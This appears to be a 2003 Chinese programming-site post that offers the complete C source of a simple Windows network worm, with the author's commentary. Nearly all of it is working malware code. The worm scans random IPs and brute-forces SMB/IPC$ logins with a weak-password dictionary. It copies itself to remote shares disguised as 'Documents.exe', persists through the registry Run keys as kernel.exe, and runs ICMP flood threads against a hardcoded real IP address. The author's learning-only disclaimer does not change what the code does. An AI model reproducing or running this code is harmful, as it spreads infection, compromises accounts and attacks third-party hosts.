DIY一个简单共享儒虫

类别:编程语言 点击:0 评论:0 推荐:

DIY一个简单共享儒虫

/*
WriteBy:LionD8
qq: 10415468
2003.2


 声明:
 本人 是为了 学习实践才写的,请大家 也只用来学习,测试用,请不要
 在INTER网上传播,否则引起的任何事情与本人和重庆黑盟无关


 先来讲讲基本思路 这个儒虫比较简单,主要是通过扫描弱口令,和共享资源进行传播。
 并且伪装一个文件夹。 当其他人 运行它后,会在系统目录复制成 KERNERL.EXE 的文件
 并修改注册表, 下次开机 自动 运行 KERNEL.EXE 再去感染其他机器。原理很简单。

 程序在调试的时候是控制台模式,所有的_tprintf是调试所用在WINMAIN里没有作用

 本病毒,没有自我保护部分,会被轻而一举的杀死。因为保护部分比较麻烦。本来做了
 一点但是 没有成功。再加上 没有多少时间,找错。就暂时不做了。 :)
 要是 哪位高手 感兴趣, 有什么好点子。一起研究啊! (上面有QQ)
 由于没有自我保护不会,这算是一个失败的儒虫,估计传播力度不大。
 由于在网上 传播病毒 违法,我也 不敢试试 威力,就只在 本机和虚拟机上测试了一下
 能达到预期目的。

 代码如下: (现丑了)
*/
#define UNICODE
#define _UNICODE

#include "winsock2.h"
#include <ws2tcpip.h>
#include "windows.h"
#include "stdio.h"
#include "lm.h"
#include "tchar.h"

#pragma comment (lib,"ws2_32")
#pragma comment (lib,"mpr")
#pragma comment (lib,"netapi32")

typedef struct _ihdr
{
 BYTE i_type; //8位类型
 BYTE i_code; //8位代码
 USHORT i_cksum; //16位校验和
 USHORT i_id; //识别号
 USHORT i_seq; //报文序列号
 ULONG timestamp; //时间戳
}ICMP_HEADER;

typedef  struct
{
int size;
SOCKADDR_IN attack;
char* buf;
SOCKET s;
}NETINFOR;  //用来传递给Attack函数的基本信息

TCHAR *DesIP=_T("209.67.3.106"); //攻击的目标 可以是白宫 :)

BOOL CALLBACK GetUserList(TCHAR *server,TCHAR Name[50][30]);
BOOL CALLBACK ConnectRemote(BOOL,TCHAR *,TCHAR *,TCHAR *,TCHAR *);
void CALLBACK RandomIP(TCHAR* RIP);
DWORD CALLBACK Spread(LPVOID);
BOOL CALLBACK GetSouces(TCHAR *server,TCHAR Souce[15][20]);
void CALLBACK UpFile(TCHAR *RIP, TCHAR *name, TCHAR *pass, TCHAR Souce[15][20]);
DWORD WINAPI Attack(LPVOID);


USHORT checksum(USHORT *buffer, int size)
{
 unsigned long cksum=0;
 while(size >1)
  {
   cksum+=*buffer++;
   size -=sizeof(USHORT);
  }
 if(size )
  {
   cksum += *(UCHAR*)buffer;
  }
 cksum = (cksum >> 16) + (cksum & 0xffff);
 cksum += (cksum >>16);
 return (USHORT)(~cksum);
}



DWORD WINAPI Spread(LPVOID)  //传播 如果探测到密码 就上传病毒
{
TCHAR PassWord[15][15]={_T(""),_T("asdf"),_T("123456789"),_T("911110"),_T("666888"),_T("hacker"),
_T("hello"),_T("password"),_T("123456"),_T("111"),_T("administrator"),_T("admin"),_T("system"),
_T("windows"),_T("123321")}; //一个内置字典 ,可以自己扩充
while(TRUE)
{
TCHAR RIP[50]=_T("");
TCHAR name[30]=_T("");
TCHAR pass[15]=_T("");
TCHAR UserName[50][30]={0};
TCHAR Souce[15][20]={0};
RandomIP(RIP);
NETRESOURCE nr;
  DWORD    ret;
  TCHAR    ipc[100]=_T("");
swprintf(ipc,_T("\\\\%s\\ipc$"),RIP);
  nr.lpLocalName=NULL;
  nr.lpProvider=NULL;
  nr.dwType=RESOURCETYPE_ANY;
  nr.lpRemoteName=ipc;
  ret=WNetAddConnection2(&nr,pass,name,0);

  if(ret!=ERROR_SUCCESS)
  {
    printf("\nIPC$ Connect Failed.\n");
continue;
  }
if( GetUserList(RIP,UserName) && GetSouces(RIP,Souce) )
{
ret=WNetCancelConnection2(ipc,0,TRUE); 
if(ret!=ERROR_SUCCESS)
{
  _tprintf(_T("IPC$ Disconnect Failed.\n"));
  // return -1;
}
BOOL ISOK=FALSE;
int k=0;
int i;
for (i=0; UserName[0]!=0 ; i++)
{
_tprintf(_T("\n next username!"));
while(k<15)
if ( ConnectRemote(TRUE,RIP,UserName,PassWord[k],_T("Admin$")) )
{
ISOK=TRUE;
wcscpy(name,UserName);
wcscpy(pass,PassWord[k]);
ConnectRemote(FALSE,RIP,UserName,PassWord[k],_T("Admin$"));
goto SpreadSuccess;
}
else k++;
if ( ConnectRemote(TRUE,RIP,UserName,UserName,_T("Admin$")) )
{
ISOK=TRUE;
wcscpy(name,UserName);
wcscpy(pass,UserName);
ConnectRemote(FALSE,RIP,UserName,UserName,_T("Admin$"));
goto SpreadSuccess;
}
}
SpreadSuccess:
if(ISOK)
{
UpFile(RIP,name,pass,Souce);
}
}
else WNetCancelConnection2(ipc,0,TRUE); 
Sleep(10);
}
}

//=============================================================
BOOL CALLBACK ConnectRemote(BOOL bConnect,TCHAR *lpHost,TCHAR *lpUserName,TCHAR *lpPassword,TCHAR *lpSouce)
{
  TCHAR     lpIPC[256]={0};
  DWORD     dwErrorCode;
  NETRESOURCE  NetResource;

swprintf(lpIPC,_T("\\\\%s\\%s"),lpHost,lpSouce);

  NetResource.lpLocalName = NULL;
  NetResource.lpRemoteName = lpIPC;
  NetResource.dwType    = RESOURCETYPE_ANY;
  NetResource.lpProvider  = NULL;

  if(!wcsicmp(lpPassword,_T("NULL")))
  {
    lpPassword=NULL;
  }

  if(bConnect)
  {
    _tprintf(_T("Now Connecting ...... "));
    while(1)
    {
         dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,0);
               if((dwErrorCode==ERROR_ALREADY_ASSIGNED) || (dwErrorCode==ERROR_DEVICE_ALREADY_REMEMBERED))
      {
               WNetCancelConnection2(lpIPC,0,TRUE);
      }
         else if(dwErrorCode==NO_ERROR)
      {
               _tprintf(_T("Success !\n"));
                break;
      }
         else
      {
        _tprintf(_T("Failure !\n"));  
        return FALSE;
      }
         Sleep(10);
    }
  }
  else
  {
    _tprintf(_T("Now Disconnecting ... "));
    dwErrorCode=WNetCancelConnection2(lpIPC,0,TRUE);
    if(dwErrorCode==NO_ERROR)
    {
      _tprintf(_T("Success !\n"));
    }
    else
    {
      _tprintf(_T("Failure !\n"));
      return FALSE;
    }
  }
    return TRUE;
}


BOOL CALLBACK GetUserList(TCHAR* server,TCHAR Name[50][30])  //获得USER列表
{
  PNET_DISPLAY_USER pBuf,pBuffer;
  DWORD       nStatus;
  DWORD       dwRec;
  DWORD       i=0;
  DWORD       lerror;
  DWORD       dwLevel;
int   Num=0;
  dwLevel=1;
// wchar_t   wpchar[30]={0};
// MultiByteToWideChar(CP_ACP,0,server,-1,wpchar,30);
// wprintf(wpchar);
  printf("\n******* GetUserList *******\n");
  do
  {
    nStatus=NetQueryDisplayInformation(server,dwLevel,i,100,0xFFFFFFFF,&dwRec,(PVOID *)&pBuf);
    if((nStatus==ERROR_SUCCESS) || (nStatus==ERROR_MORE_DATA))
    {
      pBuffer=pBuf;
      for(;dwRec>0;dwRec--)
      {
// char bufname[30]={0};
// WideCharToMultiByte(CP_MACCP,0,pBuffer->usri1_name,-1,bufname,30,NULL,NULL);
        if(Num<50)
{
memcpy(Name[Num],pBuffer->usri1_name,wcslen(pBuffer->usri1_name)*sizeof(TCHAR));
Num++;
}
else goto  UserFuncExit;
_tprintf(_T("\nName:\t\t%s"),Name[Num-1]);       
        i=pBuffer->usri1_next_index;
        pBuffer++;
      }
    }
    else
    { 
      lerror=GetLastError();
      if(lerror==997)
      {    
_tprintf(_T("\nGetUserList:\t\tOverlapped I/O operation is in progress.\n"));
      return FALSE;
}
      else
      {
        _tprintf(_T("\nGetUserList Error:\t%d\n"),lerror);
return FALSE;
      }
    }
UserFuncExit:
     if(pBuf!=NULL)
    {
     NetApiBufferFree(pBuf);
    }
  }while(nStatus==ERROR_MORE_DATA);

  return TRUE;
}

void CALLBACK RandomIP(TCHAR* RIP)   //产生一个随机IP
{
unsigned long h=GetTickCount()*198288;
CHAR *p;
p=inet_ntoa(*(struct in_addr*)&h);
MultiByteToWideChar(CP_ACP,0,p,-1,RIP,50);
_tprintf(_T("%s"),RIP);
}


BOOL CALLBACK GetSouces(TCHAR* server,TCHAR Souce[15][20]) //获得远程共享资源
{
  DWORD       er=0,tr=0,resume=0;
  DWORD       i,dwLevel;
  PSHARE_INFO_1   pBuf,pBuffer;
  NET_API_STATUS   nStatus;
  DWORD       lerror;
int   Num=0;
  dwLevel=1;
  _tprintf(_T("\n****** Netbios ******\n"));
  do
  { 
    nStatus=NetShareEnum(server,dwLevel,(PBYTE *)&pBuf,MAX_PREFERRED_LENGTH,&er,&tr,&resume);
    
if((nStatus==ERROR_SUCCESS) || (nStatus==ERROR_MORE_DATA))
    {
       pBuffer=pBuf;
       for(i=0;i<er;i++) 
{
if(Num>=15) goto ExitGetSouce;

        if(pBuffer->shi1_type==STYPE_DISKTREE)  
        {
wcscpy(Souce[Num++],pBuffer->shi1_netname);
_tprintf(_T("Name: %s\n"),Souce[Num-1]);
          _tprintf(_T("Disk drive.\n"));
        }
        else if(pBuffer->shi1_type==STYPE_PRINTQ) 
        {
          _tprintf(_T("Print queue.\n"));
        }
        else if(pBuffer->shi1_type==STYPE_DEVICE)
        {
          _tprintf(_T("Communication device.\n"));
        }
        else if(pBuffer->shi1_type==STYPE_IPC) 
        {
          _tprintf(_T("Interprocess communication (IPC).\n")); 
        }
        else if(pBuffer->shi1_type==STYPE_SPECIAL)
        {
wcscpy(Souce[Num++],pBuffer->shi1_netname);
_tprintf(_T("Name: %s\n"),Souce[Num-1]);
          _tprintf(_T("Special share reserved for interprocess communication (IPC$) or remote administration of the server (ADMIN$).\n"));
        }
        else
        {
          _tprintf(_T("\n"));
        }
        pBuffer++;
      }
    }
    else
    {
      lerror=GetLastError();
      if(lerror==997)
      {
_tprintf(_T("\nNetbios:\tOverlapped I/O operation is in progress.\n"));
return FALSE;
}
      else
      {
        _tprintf(_T("\nNetbios Error:\t%d\n"),lerror);
return FALSE;
      }
    }
ExitGetSouce:
    if(pBuf!=NULL)
    {
       NetApiBufferFree(pBuf);
    }
  }
  while(nStatus==ERROR_MORE_DATA);
  return TRUE;
}

void CALLBACK UpFile(TCHAR *RIP, TCHAR *name, TCHAR *pass, TCHAR Souce[15][20])  //在每个共享文件夹上传病毒 病毒伪装成文件夹,名字Documents.exe
{
TCHAR lpCurrentPath[MAX_PATH]={0};
TCHAR  lpSystemPath[MAX_PATH]={0};
int i;
GetSystemDirectory(lpSystemPath,MAX_PATH);
wcscat(lpCurrentPath,lpSystemPath);
_tprintf(_T("%s"),lpSystemPath);
wcscat(lpCurrentPath,_T("\\kernel.exe"));
_tprintf(_T("\n%s"),lpCurrentPath);
for (i=0; i<15 && Souce[0]!=0; i++)
{
if( ConnectRemote(TRUE, RIP, name, pass, Souce) )
{
TCHAR lpRemoteEXEPath[MAX_PATH]={0};
swprintf(lpRemoteEXEPath,_T("\\\\%s\\%s\\Documents.exe"),RIP,Souce);
CopyFile(lpCurrentPath,lpRemoteEXEPath,FALSE);
if( !wcscmp(Souce,_T("ADMIN$")) )
{
memset(lpRemoteEXEPath,0,wcslen(lpRemoteEXEPath)*sizeof(TCHAR));
swprintf(lpRemoteEXEPath,_T("\\\\%s\\%s\\"),RIP,Souce);
CopyFile(lpCurrentPath,lpRemoteEXEPath,FALSE);
}
ConnectRemote(FALSE, RIP, name, pass, Souce);
}
}
}

VOID WINAPI ModifyReg()  //修改注册表
{
TCHAR  lpSystemPath[MAX_PATH]={0};
TCHAR  lpCurrentPath[MAX_PATH]={0};
GetSystemDirectory(lpSystemPath,MAX_PATH);
wcscat(lpSystemPath,_T("\\kernel.exe"));
TCHAR  *lpValueName=_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\");
RegSetValue(HKEY_LOCAL_MACHINE,lpValueName,REG_SZ,lpSystemPath,wcslen(lpSystemPath)*sizeof(TCHAR));
TCHAR *lpSunkey=_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices\\");
RegSetValue(HKEY_LOCAL_MACHINE,lpSunkey,REG_SZ,lpSystemPath,wcslen(lpSystemPath)*sizeof(TCHAR));
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
wprintf(lpCurrentPath);
CopyFile(lpCurrentPath,lpSystemPath,FALSE);
}

DWORD WINAPI Attack(LPVOID lp)  //向目的IP发ICMP FLOOD
{
SOCKET sock;
char* AckBuf;
SOCKADDR_IN attack;
int size;
NETINFOR *p = (NETINFOR*)lp;
sock=p->s;
AckBuf=p->buf;
size=p->size;
memcpy(&attack,&p->attack,sizeof(attack));
DWORD ErrorCode=0;
while(TRUE)
{
for(int counter=0;counter<1024;counter++)
ErrorCode=sendto(sock,AckBuf,size,0,(struct sockaddr*)&attack,sizeof(attack));
Sleep(5);
}
return 0;
}

int WINAPI WinMain(
 HINSTANCE hInstance, 
 HINSTANCE hPrevInstance, 
 LPSTR lpCmdLine,  
 int nCmdShow    )

{

WSADATA WSAData;
SOCKET sock=NULL;
SOCKADDR_IN attack;
BOOL flag=TRUE;
DWORD ErrorCode=0;
ICMP_HEADER icmp_header;
memset(&icmp_header,0,sizeof(icmp_header));
if ( WSAStartup(MAKEWORD(2,2), &WSAData)!=0 )
{
return 0;
}

if((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)
{
// MessageBox(NULL,_T("sock false"),NULL,NULL);
}
int TimeOut=2000;
ErrorCode=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
 
if (ErrorCode==SOCKET_ERROR)
  {
// MessageBox(NULL,_T("ICMP false"),NULL,NULL);
  }
char cp[30]={0};
WideCharToMultiByte(CP_MACCP,0,DesIP,-1,cp,30,NULL,NULL);

attack.sin_family=AF_INET;
  attack.sin_addr.S_un.S_addr=inet_addr(cp);

icmp_header.i_type = 8;
icmp_header.i_code = 0;
icmp_header.i_cksum = 0;
icmp_header.i_id = 2;
icmp_header.timestamp = GetTickCount();
icmp_header.i_seq=888;
CHAR AckBuf[100]={0};
memcpy(AckBuf, &icmp_header, sizeof(icmp_header));
memset(AckBuf+sizeof(icmp_header), 'A', 20);
icmp_header.i_cksum = checksum((USHORT *)AckBuf, sizeof(icmp_header)+20);

int datasize=sizeof(icmp_header)+20;
memcpy(AckBuf, &icmp_header, sizeof(icmp_header));
memset(AckBuf+sizeof(icmp_header), 'A', 20);

NETINFOR infor;
memset(&infor,0,sizeof(infor));
infor.buf=AckBuf;
infor.size=datasize;
memcpy(&infor.attack,&attack,sizeof(attack));
infor.s=sock;
ModifyReg();
HANDLE t;
int i=0;

for (i=0; i<2; i++)  //用两个线程进行FLOOD攻击
t=CreateThread(NULL,0,Attack,&infor,NULL,NULL);

for (i=0; i<20; i++) //用20个线程传播
CreateThread(NULL,0,Spread,NULL,NULL,NULL);

WaitForMultipleObjects(1,&t,TRUE,INFINITE); //等待线程结束,相当于阻塞
return 1;
}


//后续: 感谢Brief的技术文章
//上述是LIOND8的个人观点。欢迎大家指正
//==============让我们共同进步!!!!! ………… 一个成长中的菜鸟

//一个没有完成的“垃圾”病毒
//不过里面的有些技术 还是值得渴望技术的新手学习的。
 

本文地址:http://com.8s8s.com/it/it26314.htm